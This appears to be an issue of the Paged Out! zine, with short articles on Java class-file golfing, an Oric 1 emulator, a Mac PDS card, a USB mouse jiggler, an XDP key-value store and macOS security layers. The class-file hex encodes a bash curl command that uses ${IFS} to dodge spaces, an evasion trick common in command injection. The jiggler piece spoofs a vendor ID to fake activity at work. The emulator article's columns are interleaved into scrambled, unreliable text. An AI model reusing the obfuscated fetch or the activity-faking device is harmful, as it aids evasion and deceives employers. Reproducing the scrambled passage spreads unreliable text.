b6 00 03 invokevirtual Runtime::exec(String;) (ref constant entry #3)
57 pop
b1 return
The pop instruction is there because invokevirtual pushes the resulting Process instance onto the stack. We ignore that instance, so the Java
compiler is nice and removes it, leaving the stack just as the main method got it. However, the JVM doesn’t seem to
care about that, so we can remove the pop instruction, saving one more byte and making our entire code 9 bytes long. This
got me to 275 bytes in total. Here are the bytes and some information about my Code.class:

cafe babe 0000 0037 0011 0a00 0800 0908 000a 0a00 0800 0b07 0005 0100 0443 6f64 6501 0004
6d61 696e 0100 1628 5b4c 6a61 7661 2f6c 616e 672f 5374 7269 6e67 3b29 5607 000c 0c00 0d00
0e01 0027 6261 7368 202d 6320 6375 726c 247b 4946 537d 2d4c 247b 4946 537d 3766 2e75 6b3e
2f64 2a2f 7474 790c 000f 0010 0100 116a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 0100 0a67
6574 5275 6e74 696d 6501 0015 2829 4c6a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 3b01 0004
6578 6563 0100 2728 4c6a 6176 612f 6c61 6e67 2f53 7472 696e 673b 294c 6a61 7661 2f6c 616e
672f 5072 6f63 6573 733b 0421 0004 0008 0000 0000 0001 0009 0006 0007 0001 0005 0000 0015
0002 0001 0000 0009 b800 0112 02b6 0003 b100 0000 0000 00
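The dump above can be sanity-checked with a short script that walks the class file header and constant pool. This is a minimal sketch, not a general class file parser: it only understands the five constant tags that occur in this particular file, and the helper names are invented for the example.

```python
import struct

CLASS_HEX = """
cafe babe 0000 0037 0011 0a00 0800 0908 000a 0a00 0800 0b07 0005 0100 0443 6f64 6501 0004
6d61 696e 0100 1628 5b4c 6a61 7661 2f6c 616e 672f 5374 7269 6e67 3b29 5607 000c 0c00 0d00
0e01 0027 6261 7368 202d 6320 6375 726c 247b 4946 537d 2d4c 247b 4946 537d 3766 2e75 6b3e
2f64 2a2f 7474 790c 000f 0010 0100 116a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 0100 0a67
6574 5275 6e74 696d 6501 0015 2829 4c6a 6176 612f 6c61 6e67 2f52 756e 7469 6d65 3b01 0004
6578 6563 0100 2728 4c6a 6176 612f 6c61 6e67 2f53 7472 696e 673b 294c 6a61 7661 2f6c 616e
672f 5072 6f63 6573 733b 0421 0004 0008 0000 0000 0001 0009 0006 0007 0001 0005 0000 0015
0002 0001 0000 0009 b800 0112 02b6 0003 b100 0000 0000 00
"""
data = bytes.fromhex("".join(CLASS_HEX.split()))

# Payload sizes in bytes (after the tag) for the fixed-size tags in this file:
# 7 = Class, 8 = String, 10 = Methodref, 12 = NameAndType.
FIXED = {7: 2, 8: 2, 10: 4, 12: 4}

def parse_constant_pool(blob):
    magic, _minor, major, count = struct.unpack_from(">IHHH", blob, 0)
    assert magic == 0xCAFEBABE
    pos, pool = 10, {}              # the pool starts 10 bytes into the file
    for index in range(1, count):   # entries are numbered 1..count-1
        tag = blob[pos]
        if tag == 1:                # Utf8: 2-byte length, then the bytes
            (length,) = struct.unpack_from(">H", blob, pos + 1)
            pool[index] = blob[pos + 3:pos + 3 + length].decode("utf-8")
            pos += 3 + length
        else:                       # fixed-size entry holding 2-byte indices
            size = FIXED[tag]
            fields = struct.unpack_from(">" + "H" * (size // 2), blob, pos + 1)
            pool[index] = (tag,) + fields
            pos += 1 + size
    return major, pool, pos

major, pool, pos = parse_constant_pool(data)
_flags, this_class, super_class = struct.unpack_from(">HHH", data, pos)
class_name = pool[pool[this_class][1]]
super_name = pool[pool[super_class][1]]
print(len(data), major, class_name, super_name)
for index, entry in pool.items():
    print(index, entry)
```

The printout shows the string reuse described earlier: the single "Code" entry serves as both the class name and the name of the Code attribute, and java/lang/Runtime is both the superclass and the owner of getRuntime and exec.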

Jonathan Bar Or ("JBO")


X/Twitter: @yo_yo_yo_jbo
Blog: https://yo-yo-yo-jbo.github.io
10 SAA-ALL 0.0.7
(untitled) (II) Art

Maung Thuta
Twitter: @CypressDahlia
SAA-ALL 0.0.7 11
https://www.pixiepointsecurity.com

A CYBERSECURITY BOUTIQUE OFFERING


NICHE AND BESPOKE RESEARCH SERVICES
Vulnerability Discovery
• Offers (offensive) intelligence of security weaknesses in systems
Malware Analysis
• Provides (defensive) intelligence of hostile code in systems and infrastructure
Tools Development
• Offers custom capabilities to improve existing workflow and methodologies
Trainings and Workshops
• Provides custom-tailored vulnerability discovery and malware analysis classes

https://www.pixiepointsecurity.com
Slowcoding my childhood GameDev

Slowcoding my childhood

This is the story about programming something for 15 years, just because of the love for programming and the love for one’s first computer.

My very first own computer was the British Tangerine Oric 1, released in 1982. It is a strange computer to appear under a Christmas tree in Sweden. The Oric was followed by others, but remained very special to me. Computers and programming became a wonderfully fun career. But during a slow and frustrating period 15 years ago I decided to program something only for myself. It became an emulator of Oric 1. It has been my slowest and most fun project ever!

The Oric design is similar to many machines from the old times: a 6502 CPU, a 6522 VIA chip, an AY-3-8912 sound chip, a mystery graphics ULA chip, a ROM and some RAM.

The 6502 has 56 instructions and 6 registers. A program counter (PC) points to where to execute. The A, X and Y registers are used for calculations and indexing. To that, add a stack pointer and some interrupts. With 13 addressing modes, it becomes 151 opcodes to implement. Each opcode implements what the processor does for one variant of an instruction.

Memory is just an array of bytes in the emulator. Registers become simple variables. Executing an instruction means reading the byte at the PC to see the current opcode, then executing that opcode's implementation, and afterwards updating the PC accordingly. Repeat.

generates the graphics output signal. It means cycle counting and generating screen lines due to rules.

After some work with SDL and implementing the ULA, I was finally able to see the graphics output of Oric 1 starting up! I can’t describe in words the joy of getting graphics output after so many years!

The Oric designers connected the keyboard key matrix to the VIA chip and the sound chip in a weird way. This means that half the sound chip must be implemented to get key input.

After 8 years of slow programming, I got the key input to work! I could finally tell the old Oric to print ”HELLO!” all over the screen!

One of the main goals has always been to be able to play the games I played back in the day. Loading from tape on a real Oric meant that audio input toggled a bit in the 6522. In the emulator, it means reading an image file and toggling the same bit with carefully recreated time intervals.

I had quite a long break from the project before I finally did the tape loading. Family matters like having kids got in between. But after 11 years, I could finally load and play my childhood games. Even though they lacked sound, it was super cool!

To get sound, the rest of the sound chip must be implemented. The AY-3-8912 has 16 registers that control square wave and noise output to three channels. For an emulator, this means more cycle counting and creating a sound waveform from bit toggling.
I implemented the sound last year. After that, I was finally able to
It took me almost 5 years to implement the 151 opcodes fully. I hear the results of the funny BASIC
only programmed on it when I felt like commands ZAP, PING, SHOOT and
it. I allowed no stress at all! When done EXPLODE and I could play games
I couldn’t do very much. I needed more with sound! While I was working on it,
chips! it often sounded like a disaster! My
Most chips that are emulated are family complained for half that
small machines themselves. This summer.
means reading 50 year old specs The rest of the work up to now has
a n d t r a n s l a t i n g h a rd w a re t o been to debug all the clock cycle
software. Registers become handling and fixing some bugs here
variables and behaviors become and there. A bug in the 6502 from 14
functions. Each chip gets an years ago caused aliens in a space
exec() function that does what the shooter to behave wrong. A cycle
chip did each clock cycle. The chips counting bug for interrupts meant
are connected to each other through I/O functions and that the liana that Quasimodo jumps in the game
together they make magic. Hunchback moved too slow. They were a pain to debug,
The MOS 6522 Versatile Interface Adaptor is a wonderfully but now I can play the games of my childhood for real!
complex chip with two 16 bit counters, interrupt triggering, As with many great things, the journey has been the real
a shift register, two 8 bit I/O ports and some control lines. reward! I really love playing around with my emulator and
All run at clock cycle speed. I still add new things. But all hours implementing opcodes
It took me two years to implement enough of the 6522. I needed to and chips were almost meditative and relaxing. The reward
add clock cycle handling for the 6502 as well. With it in place, I for translating old specifications to code that works have
could start the system and see that it executed the real ROM been enormous! And most importantly, no-one has been
code. After boot, I could see the boot text character codes in the able to stress me, control the process or comment on the
screen RAM, a first sign of life! I screamed with joy, so loudly implementation. With that, the slow development has been
that my wife thought I was having a heart attack! a great joy!

To get some visual output, the least documented part of the Lots of respect to The Defence Force for reverse engineering and
Oric must be implemented, the ULA: a gate array that documenting the Oric as well as creating great demos and games!
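The loop described in this article (read the byte at the PC, run that opcode's implementation, update the PC, count cycles, repeat) can be sketched in a few lines. This is only an illustration and not the author's emulator: the class and function names are made up, just five opcodes are handled, status flags are ignored, and BRK is treated as "stop", which a real 6502 does not do.

```python
# Minimal sketch of a fetch-decode-execute loop; NOT the author's emulator.
# Only five 6502 opcodes are handled and status flags are ignored.

class Cpu:
    def __init__(self):
        self.memory = bytearray(65536)  # memory is just an array of bytes
        self.pc = 0                     # program counter
        self.a = self.x = self.y = 0    # registers become simple variables
        self.cycles = 0                 # clock cycles consumed so far
        self.halted = False

    def fetch(self):
        """Read the byte at the PC, then advance the PC."""
        value = self.memory[self.pc]
        self.pc = (self.pc + 1) & 0xFFFF
        return value

    # One small method per opcode: an instruction in one addressing mode.
    def lda_imm(self):   # LDA #nn: load A with the next byte
        self.a = self.fetch()

    def sta_zp(self):    # STA nn: store A at a zero-page address
        self.memory[self.fetch()] = self.a

    def tax(self):       # TAX: copy A into X
        self.x = self.a

    def inx(self):       # INX: increment X, wrapping at 8 bits
        self.x = (self.x + 1) & 0xFF

    def brk(self):       # BRK: used as a stop marker in this sketch only
        self.halted = True

    def step(self):
        opcode = self.fetch()
        handler, cost = OPCODES[opcode]
        handler(self)
        self.cycles += cost


# opcode byte -> (implementation, clock cycles)
OPCODES = {
    0xA9: (Cpu.lda_imm, 2),
    0x85: (Cpu.sta_zp, 3),
    0xAA: (Cpu.tax, 2),
    0xE8: (Cpu.inx, 2),
    0x00: (Cpu.brk, 7),
}


def run(program, origin=0x0600):
    """Load the program bytes at origin and execute until BRK."""
    cpu = Cpu()
    cpu.memory[origin:origin + len(program)] = bytes(program)
    cpu.pc = origin
    while not cpu.halted:
        cpu.step()
    return cpu


# LDA #5; TAX; INX; STA $10; BRK
cpu = run([0xA9, 0x05, 0xAA, 0xE8, 0x85, 0x10, 0x00])
```

A table that maps each opcode byte to a handler and a cycle cost keeps the per-opcode code tiny, and the cycle counter is what the other chips' exec() functions would be driven from.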

Anders Piniesjö
GitHub: https://github.com/pugo/Pugo-Oric
Me: https://www.pugo.org/ SAA-TIP 0.0.7
Hardware Making a simple Macintosh LC PDS card

In 1990, Apple released the Macintosh LC, which was powered by the Motorola MC68020 processor. Its only expansion card slot was the Processor Direct Slot (PDS), a 96-pin Eurocard connector that provided direct access to most of the CPU's signals.

This slot survived all the way to the mid '90s when the Mac had moved to PowerPC. On newer machines, it was no longer directly connected to the CPU but instead an ASIC emulated 68030 bus cycles for backward compatibility. Many popular machines including the Color Classic and LC 475 have a PDS.

Let's make a simple PDS card that enables a Mac program to control a few LEDs. First, we need to understand 68020 and 68030 read and write cycles.

The R/W line determines if a cycle is a read or write. During a read cycle, the CPU writes the address to A31-0. The address and data strobes are asserted during S1, and assuming there are no wait states, the CPU will latch the incoming data from our card on the rising clock edge at the end of S4.

Write cycles are similar, but the CPU supplies the data. It asserts the data strobe during S3, signaling that the data is ready on the bus.

All of these signals are available on the PDS connector. In order to react quickly enough to meet these tight timing requirements, a programmable logic device is an ideal solution. We're going to use an ATF22V10C CMOS PLD programmed with CUPL.

The card is selected when A31 is high, A24 is low, and /AS is asserted. Requiring A24 to be low ensures we ignore special CPU space cycles.

PIN 1 = CLOCK; PIN 2 = A31; PIN 3 = A24;
PIN [14..16] = ![LED1..3]; PIN 4 = RW;
PIN [17..19] = [D0..2]; PIN 5 = !AS;
PIN [20..21] = ![DSACK0..1]; PIN 6 = !DS;
PIN 22 = DSACK_OE; PIN 23 = AS_DELAY;

To handle read cycles, we respond with the existing LED state whenever our card is selected, /AS and /DS are asserted, and RW is high.

PDS_SELECT = A31 & !A24 & AS;
[D0..2] = [LED1..3];
[D0..2].oe = PDS_SELECT & DS & RW;

Write cycles are slightly more complex but still straightforward. We latch the new state of the LEDs from the data bus on the rising clock edge at the end of S3, assuming our card is selected. On all other rising clock edges, we just latch the existing state, resulting in no change to the LEDs.

LED_WRITING = PDS_SELECT & DS & !RW;
[LED1..3].d = ([D0..2] & LED_WRITING) #
              ([LED1..3] & !LED_WRITING);
[LED1..3].ar = 'h'0; [LED1..3].sp = 'h'0;

In both cases, we need to immediately acknowledge the request on the /DSACK pins. This tells the CPU we've handled the read or write, avoids any wait states, and also informs it of the data width we're returning, which is 32 bits for simplicity.

[DSACK0..1] = PDS_SELECT;

However, the /DSACK pins must be left floating except when our card is addressed. We also need to drive them high afterward, or else resistors will pull them up too slowly and possibly interfere with the next bus cycle. This is handled with a register that delays the PDS selected signal.

AS_DELAY.d = PDS_SELECT;
AS_DELAY.ar = 'b'0; AS_DELAY.sp = 'b'0;
DSACK_OE = (PDS_SELECT) # (AS_DELAY & !AS);
[DSACK0..1].oe = DSACK_OE;

After the PDS card is wired up using the pinout listed above, the LEDs can be controlled in C:

static volatile uint32_t *PDSBase(void) {
    return (volatile uint32_t *)
        (LMGetMMU32Bit() ? 0xE0000000UL :
                           0x00E00000UL);
}
static void SetLEDOn(int led, bool on) {
    if (on)
        *PDSBase() |= (1UL << led);
    else
        *PDSBase() &= ~(1UL << led);
}

This design won't work on the original Mac LC in 24-bit addressing mode; it lacks an MMU that would remap PDS reads and writes to the equivalent 32-bit address. This is possible to fix by looking at extra signals when determining if the card is selected, but may require removing an LED to make room for more logic and is left as an exercise for the reader.
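To check the decoding logic before burning a PLD, the select and LED-latch equations from this article can be modelled in software. The sketch below is a hypothetical helper, not part of the author's design: the function names are invented, and every strobe is passed as an "asserted" boolean, mirroring how the CUPL pin declarations invert the active-low /AS and /DS.

```python
# Software model of the card's address decoding and LED register.
# Assumption: strobes are passed as booleans where True means "asserted".

def pds_select(address, as_asserted):
    """PDS_SELECT = A31 & !A24 & AS"""
    a31 = bool(address & (1 << 31))
    a24 = bool(address & (1 << 24))
    return a31 and not a24 and as_asserted


def next_led_state(leds, data_bus, address, as_asserted, ds_asserted, rw_high):
    """Value latched into the 3-bit LED register on a rising clock edge."""
    writing = pds_select(address, as_asserted) and ds_asserted and not rw_high
    # New state comes from D0..2 while writing, otherwise the old state is kept.
    return (data_bus & 0b111) if writing else leds


# The 32-bit base address used by the C code selects the card...
selected_32bit = pds_select(0xE0000000, True)
# ...but the raw 24-bit address does not, because A31 is low.
selected_24bit = pds_select(0x00E00000, True)
```

The second call shows the limitation mentioned at the end of the article: without an MMU remapping the access, an address of 0x00E00000 never sets A31, so the card stays deselected.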

Doug Brown
Blog: https://www.downtowndougbrown.com/
X/Twitter: @dt_db SAA-TIP 0.0.7
Remote work automation using an old AVR programmer Hardware

Bathroom break extension tool made from an AVR programmer

Steve, as a middle-aged electronics enthusiast, has a few unused AVR programmers. He works remotely and would like to be more efficient. What should he do? Automate, of course. How can he automate? Use a mouse jiggler. Fortunately, Steve does not need to invest money in a professional device for remote working. He pulls out a USBasp from a dusty shelf and starts tinkering. He devises a plan:

1. Get the source code of the firmware from https://www.fischl.de/usbasp/.
2. Fix compilation issues if needed.
3. Remove programming functionality.
4. Implement a valid USB HID interface for a mouse device.
5. Implement moving the cursor on the screen after connecting the device.

Step 1 is obvious, but what about others?

An error-free start

The source code is over 13 years old! In the meantime, compilers went a long way in terms of generating quality code and detecting possible issues. What was correct back then, now can be perceived as smelly or even faulty.

Steve tries to build the downloaded source and gets a bunch of errors similar to this:

In file included from usbdrv/usbdrv.c:12:
usbdrv/usbdrv.h:455:6: error: variable 'usbDescriptorDevice' must be const in order to be put into read-only section by means of '__attribute__((progmem))'
  455 | char usbDescriptorDevice[];

Trivial, thinks Steve. He precedes char with const. The compilation stage goes smoothly, contrary to linking. He sees the following:

/usr/bin/avr-ld: main.o:(.bss+0x0): multiple definition of `ispTransmit'; isp.o:(.bss+0x4): first defined here

Steve takes a deep breath and traverses isp.c and isp.h. A declaration is not a definition, he sighs, prepends extern before uchar (*ispTransmit)(uchar) in isp.h and adds a proper definition in isp.c.

Eradication

What can be easier than removing code? The slightly bored man opens Makefile and removes isp.o, clock.o and tpi.o from built objects. He removes corresponding .c and .h files as well. He deletes any code referencing them from main.c hard-heartedly. What is left are stubs of usbFunctionSetup, usbFunctionRead and usbFunctionWrite.

Basic mouse firmware

Mice are common PC equipment. It would be tiresome for manufacturers to implement or even for users to install an OS driver each time for a new device. That's why the communication protocol for commonly used types of devices was standardized under the name USB HID (Human Interface Device). It is enough to stick to it and Steve's jiggler will work out of the box.

Each USB device needs to provide to an OS a set of descriptors describing its manufacturer and functionality. Additionally, for HID devices yet another descriptor needs to be provided to describe the data format to be exchanged. In the case of a mouse, this HID descriptor contains information on how data about button presses and mouse motion will be conveyed to a PC.

Steve modifies usbconfig.h to meet his requirements. He changes USB_CFG_VENDOR_ID, USB_CFG_DEVICE_ID and a few other macros to fake a mouse of a popular manufacturer. He sets a device class and subclass to 0 as an interface within a configuration specifies its own class information. Then, he sets an interface class, subclass and protocol to, respectively, 0x03 (HID Interface Class), 0x01 (Boot Interface Subclass) and 0x02 (Mouse Protocol). Is that all?

No, Steve still needs a valid USB HID descriptor for a mouse device. He is too lazy to write his own from scratch, so he downloads HID Descriptor Tool from https://usb.org/ and copies a premade one to main.c as const char usbHidReportDescriptor[], which is used internally by the USB stack as soon as the HID report descriptor length macro is set to a non-zero value. The chosen HID descriptor specifies a 3-byte report buffer to be used for the sake of data exchange. Steve declares uchar reportBuffer[3] and makes sure the contents are sent as soon as they can be sent by adding

if (usbInterruptIsReady()) {
    usbSetInterrupt(reportBuffer, sizeof(reportBuffer));
}

in the usbPoll() loop in main.c. USB HID protocol uses an interrupt-in endpoint 1 for communication, so Steve sets USB_CFG_HAVE_INTRIN_ENDPOINT to 1. He also sets both USB_CFG_IMPLEMENT_FN_WRITE and USB_CFG_IMPLEMENT_FN_READ to 0, and removes redundant usbFunctionRead and usbFunctionWrite function stubs left from the old implementation.

Moving the mouse cursor

Easy-peasy, mumbles Steve, and provides random values for the 2nd (relative X coordinate) and 3rd (Y) byte of reportBuffer each time before it is sent. Such a solution does not resemble human interaction. Could you do better? If not, take a look at https://github.com/szymor/usbasp-jiggler for inspiration.
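The 3-byte report that Steve sends can be prototyped on a PC before touching the firmware. The sketch below assumes the common boot-mouse layout (button bits in the first byte, then signed 8-bit relative X and Y, matching the 2nd and 3rd bytes mentioned in the article). The function names and the square pattern are made up for illustration and are not taken from the usbasp-jiggler repository.

```python
import struct


def mouse_report(buttons=0, dx=0, dy=0):
    """Pack a 3-byte report: button bits, then signed 8-bit X and Y deltas."""
    return struct.pack("<Bbb", buttons, dx, dy)


def square_jiggle(step=2):
    """Yield reports tracing a small square, ending where the cursor started."""
    for dx, dy in ((step, 0), (0, step), (-step, 0), (0, -step)):
        yield mouse_report(dx=dx, dy=dy)


reports = list(square_jiggle())
```

Unlike purely random deltas, a closed path keeps the cursor from drifting across the screen over time; on the device, each of these byte triples would be copied into reportBuffer before the next usbSetInterrupt() call.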

Szymon Morawski
https://szymor.github.io/
CC0 15
History AI Won’t Take Your Job



By ~ @Totally_Not_A_Haxxer

It's 2024, and we’ve hit quite the wall with technology—or should I say, war (lol).
The wall in question? Jobs. Yeah, everyone’s freaking out about how AI is
supposedly coming for all the real hackers' and developers' gigs. But hey, instead
of jumping on the clickbait train with every video, maybe it's time to look at things
from a more positive angle.

If we sit and ask ourselves the question “will AI take our job?” and think it through
logically, while also analyzing our current implementations of AI, a better question
appears: will you go through the wringer because of AI, or because your skill set is
simply not good enough?

Many jobs that people worry about being taken, especially intricate ones such as
reverse engineering and binary exploit development, will likely not be replaced
because of how much it takes to train a model to do such tasks. This often involves
a lot of money and resources. However, you may find jobs where simple tasks
are being given to AI, such as minor development tasks rather than full-fledged
code completion. That being said, while AI is taking some jobs, saying that
we will be out of jobs or that AI is going to replace us is entirely wrong.

A company I worked at as a ghostwriter for some time replaced my job with GPT.
I had been writing articles for a few months, but they wanted to meet impossible
mass production quantities for cheap, so they moved to using GPT and Jasper to
generate articles. After that, I did not stop. I kept going forward and found
ways to tune my work and make it more unique. By then, I had figured out that
jobs are taken from people for multiple reasons, but the primary one is a list
of business needs: mass production, funding, production time, and fast ideas.

Ever since I dedicated some time to researching the capabilities of AI,
understanding what it is, and listening to people’s perspectives, especially in other
fields such as art, I have realized that you will only have your job taken if you are easy
to replace, predictable, fixed in style, and just doing a task. After all, there is a
reason why some artists are losing to AI while others are still racking up stacks of
cash from their art. Their work is unique because it uses elements
that AI cannot achieve, such as true randomness (true randomness is
unpredictable because it comes from natural, uncontrollable processes, unlike
AI's algorithms). I truly feel that one can survive the wave of AI with
a versatile skill set, an understanding of how to get a job without relying only on a
resume, and the ability to adapt to modern-day changes.
Adaptation and collaboration are how you survive and soar into the skies.

Totally_Not_A_Haxxer
Instagram: https://www.instagram.com/totally_not_a_haxxer
Blog: https://www.medium.com/@Totally_Not_A_Haxxer
GitHub: https://www.github.com/TotallyNotAHaxxer CC BY 4.0
Art diary of Ninja Jo (I) Art

Ninja Jo
Cara: https://cara.app/ninjajoart
YouTube: https://www.youtube.com/c/ninjajo_art
Instagram: https://www.instagram.com/ninjajo_art/ SAA-TIP 0.0.7
Art Art diary of Ninja Jo (II)

Ninja Jo
Cara: https://cara.app/ninjajoart
YouTube: https://www.youtube.com/c/ninjajo_art
Instagram: https://www.instagram.com/ninjajo_art/ SAA-TIP 0.0.7
Networks Misusing XDP to make a KV Store

XDP is a feature of the Linux kernel that allows you to use eBPF to process packets in the kernel, bypassing the network stack. We can use it to implement a terrible Key-Value store that can be queried over the network by seeing if it drops a TCP connection. By sending a guess, the eBPF code can check if it's greater than the real value and drop the connection if that is the case. This lets us perform a binary search to discover the value!

# Usage for Ubuntu 24.04
# S = Server, C = Client
S $ apt install clang libbpf-dev socat
S $ clang -O3 -g -c -target bpf \
      -I /usr/include/x86_64-linux-gnu/ \
      -I /usr/include/bpf/ \
      -o xdpkv.o xdpkv.c
S $ sudo ip link set lo \
      xdpgeneric obj xdpkv.o sec xdpkv
S $ socat tcp-l:1234,fork exec:cat
C $ python3 client.py
S $ sudo ip link set lo xdpgeneric off

# client.py
import socket, struct, time, math
class Client: # Ask the server and try
    def __init__(s, pair): s._pair = pair
    def cmd(s, cmd, k, v=0, to=0.2):
        # to make a connection, if we get a
        try: # timeout, our packet maybe got
            so = socket.socket( # dropped along
                socket.AF_INET, socket.SOCK_STREAM
            ) # the way but we'll be optimistic
            so.settimeout(to) # that our packet
            so.connect(s._pair) # has made its
            so.sendall(struct.pack( # way on a
                '>LLLL', 0x1337, cmd, k, v) # long
            ) # journey so we can return true
            so.recv(1) # unless we really have
            so.close() # waited far too long
            return True # and except its fate.
        except TimeoutError: return False
    def get(s, key): # But now we can try
        if not (res := not s.cmd(0, key)):
            return res # doing a binary search
        bot, top = 0, 0xff_ff_ff_ff
        while bot != top: # to find out what
            m = math.ceil((bot + top) / 2)
            if s.cmd(1, key, m): bot = m
            else: top = m - 1
        return bot # we are looking for.
# So what can we do now? maybe we can
c = Client(('localhost', 1234)) # conn
c.cmd(2, 1337, 0x41_42_43_44) # or set
print(hex(c.get(1337))) # or get
c.cmd(3, 1337) # or maybe even unset
print(not c.cmd(0, 1337)) # or exist?

/* xdpkv.c */
#include <linux/bpf.h>
#include <bpf_helpers.h>
#include <bpf_endian.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/if_ether.h>
/* After the includes, we need to */
struct { /* first setup a eBPF map */
    __uint(type, BPF_MAP_TYPE_HASH);
    __type(key, __u32);
    __type(value, __u32);
    __uint(max_entries, 1024);
} data_map SEC(".maps");
/* that we control with data we get */
struct cmd { /* from this struct */
    __u32 magic; __u32 cmd; /* inside */
    __u32 key; __u32 value; /* the */
}; /* packets that pass a check, */
/* but first skip over the headers */
SEC("xdpkv")
int xdpkv_entry(struct xdp_md *ctx) {
    void *dend =
        (void *)(long)ctx->data_end;
    void *data = (void *)(long)ctx->data;
    data += sizeof(struct ethhdr);
    data += sizeof(struct iphdr);
    struct tcphdr *tcp = data;
    if (data + sizeof(*tcp) > dend)
        goto out;
    data += tcp->doff * 4;
    struct cmd *c = data;
    if (data + sizeof(*c) > dend)
        goto out; /* and look for a magic */
    if (bpf_htonl(c->magic) != 0x1337)
        goto out; /* and if we find it, */
    __u32 key = bpf_htonl(c->key);
    __u32 value = bpf_htonl(c->value);
    __u32 *r = bpf_map_lookup_elem(
        &data_map, &key); /* we can then */
    switch (bpf_htonl(c->cmd)) {
    case 0: /* EXISTS */
        if (r != NULL)
            return XDP_DROP;
        break;
    case 1: /* QUERY */
        if (r == NULL || value > *r)
            return XDP_DROP;
        break;
    case 2: /* SET */
        bpf_map_update_elem(
            &data_map, &key, &value, BPF_ANY);
        break;
    case 3: /* UNSET */
        bpf_map_delete_elem(
            &data_map, &key);
    } /* interact and take action. */
out: return XDP_PASS;
}
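The binary search can be tried without a network or a kernel by replacing the connection with a local stand-in. In the sketch below, make_oracle() is a hypothetical helper that mimics the QUERY command (the packet passes when the guess is not greater than the stored value), and recover() follows the same bot/top logic as the client, using integer arithmetic instead of math.ceil.

```python
def make_oracle(store):
    """Return (passes, counter); passes(key, guess) mimics the QUERY command:
    True when the packet would pass, i.e. the key exists and guess <= value."""
    counter = {"queries": 0}

    def passes(key, guess):
        counter["queries"] += 1
        return key in store and guess <= store[key]

    return passes, counter


def recover(passes, key, top=0xFFFF_FFFF):
    """Find the stored 32-bit value by asking only 'did my guess pass?'."""
    bot = 0
    while bot != top:
        mid = (bot + top + 1) // 2   # round up so the range always shrinks
        if passes(key, mid):
            bot = mid                # connection survived: value >= mid
        else:
            top = mid - 1            # connection dropped: value < mid
    return bot


passes, counter = make_oracle({1337: 0x41_42_43_44})
value = recover(passes, 1337)
```

Each answer halves the remaining range, so one 32-bit value costs 32 connections. The real client first issues EXISTS, because for a missing key every QUERY is dropped and the search would settle on 0.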

bah
https://b.horn.uk/
https://github.com/bahorn/ CC0
Art diary of Ninja Jo (III) Art

Ninja Jo
Cara: https://cara.app/ninjajoart
YouTube: https://www.youtube.com/c/ninjajo_art
Instagram: https://www.instagram.com/ninjajo_art/ SAA-TIP 0.0.7
OS Internals Lord of the Apples: One Page To Rule Them All



This short article explores the layered security mechanisms in macOS that protect users from malware.

Introduction
Before malicious software can run on macOS, it must overcome multiple layers of security mechanisms that Apple has designed to
protect users. From the moment a file is downloaded to the point of its execution, macOS implements a series of thorough checks that
rigorously block threats. Even when the malware successfully runs, it is additionally isolated with sandboxing mechanisms.

Apple macOS Security Layers


Onions have layers, ogres have layers, and Apple's security also has layers.

1. Quarantine and Gatekeeper - Prevents automatic execution of files, notifying users before they open the file.
When a file is downloaded from the internet, macOS applies a quarantine flag. It indicates that the file originated from an
untrusted source. Technically, this flag is a file extended attribute of com.apple.quarantine (we can check it using ls -l@ or
xattr -l). Files without it bypass all further security mechanisms related to Gatekeeper.

2. Gatekeeper and Notarization - Ensures the application meets the Apple Security policy and it is free from malware.
The Gatekeeper verifies the file to ensure it meets Apple's security requirements. This verification is done using the ticket that
Apple attaches to the application during notarization. All applications must first be uploaded to Apple and notarized.

3. Gatekeeper and XProtect - Blocks malicious files by checking for valid signatures and known threats.
However, it is still possible for the user to agree to run a file that has not been notarized in the window displayed by
Gatekeeper. In this case, XProtect (a built-in malware scanner) verifies whether the file is a virus based on its signatures. If the
signature is known as a virus, the execution is blocked.

4. Code Signing and AMFI (Apple Mobile File Integrity) - Prevents execution of unsigned or tampered applications.
To run, every application must be code-signed: by a developer using a Developer Certificate, directly by Apple, or ad hoc.
Code signing confirms the integrity and authenticity of applications by verifying their digital signatures, ensuring
that they have not been tampered with. During runtime, AMFI is the component that enforces the validity of these signatures.

5. Sandboxing and TCC - Prevents untrusted applications from accessing critical system resources and sensitive data.
TCC manages access to user data (through user consent), while the Sandbox controls app behavior (via system-imposed
restrictions). Both isolate applications, restricting their access to system resources (such as camera or microphone) and
managing permissions for access to sensitive data. So even when the malware successfully bypasses all the previous layers,
its damage is mitigated thanks to this protection because it cannot access all files and use all hardware resources.

6. System Integrity Protection (SIP) - Prevents unauthorized modification of system files, even by the root user.
Even if malware exploits a zero-day vulnerability to gain root access, macOS has System Integrity Protection (SIP), which
restricts root-level modifications to system files and processes. SIP ensures that critical system components are protected
from even privileged users. With SIP on, you should not be able to damage your Mac even as root (at least you shouldn't :D).
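As a small illustration of layer 1, the value stored in the com.apple.quarantine attribute (as printed by xattr -l) can be split into its parts. The layout assumed here, semicolon-separated hexadecimal flags, a hexadecimal Unix timestamp, the downloading agent and an event identifier, is the commonly described one and is not taken from this article, so treat the field names and the sample value as assumptions.

```python
from datetime import datetime, timezone


def parse_quarantine(value):
    """Split a com.apple.quarantine value into its semicolon-separated fields.

    Assumed layout: flags;timestamp;agent;event_id (flags and timestamp in hex).
    """
    parts = value.split(";")
    flags, stamp = parts[0], parts[1]
    agent = parts[2] if len(parts) > 2 else ""
    event_id = parts[3] if len(parts) > 3 else ""
    return {
        "flags": int(flags, 16),
        "timestamp": datetime.fromtimestamp(int(stamp, 16), tz=timezone.utc),
        "agent": agent,
        "event_id": event_id,
    }


# Hypothetical sample value, made up for this sketch.
info = parse_quarantine("0083;00000000;Safari;EXAMPLE-EVENT-ID")
```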

References
1. https://github.com/Karmaz95/Snake_Apple
2. https://support.apple.com/en-gb/guide/security/welcome/web
3. https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution
4. https://developer.apple.com/documentation/security/code-signing-services
5. https://developer.apple.com/documentation/security/app-sandbox

Karol Mazurek
GitHub: https://github.com/karmaz95
X/Twitter: https://x.com/karmaz95
Blog: https://medium.com/@karol-mazurek CC BY 4.0
Cozy magic shop Art
Igor "grigoreen" Grinku
https://x.com/Grigoreen
https://www.artstation.com/grigoreen SAA-ALL 0.0.7
Art Fatbeard Ramen House
Instagram: @that.pixel.artistt Fatbeard
X/Twitter: @Fatbeard991
DeviantArt: https://www.deviantart.com/fatbeard91 SAA-ALL 0.0.7
Linktree: https://linktr.ee/that.pixel.artistt
macOS Notifications Forensics OS Internals

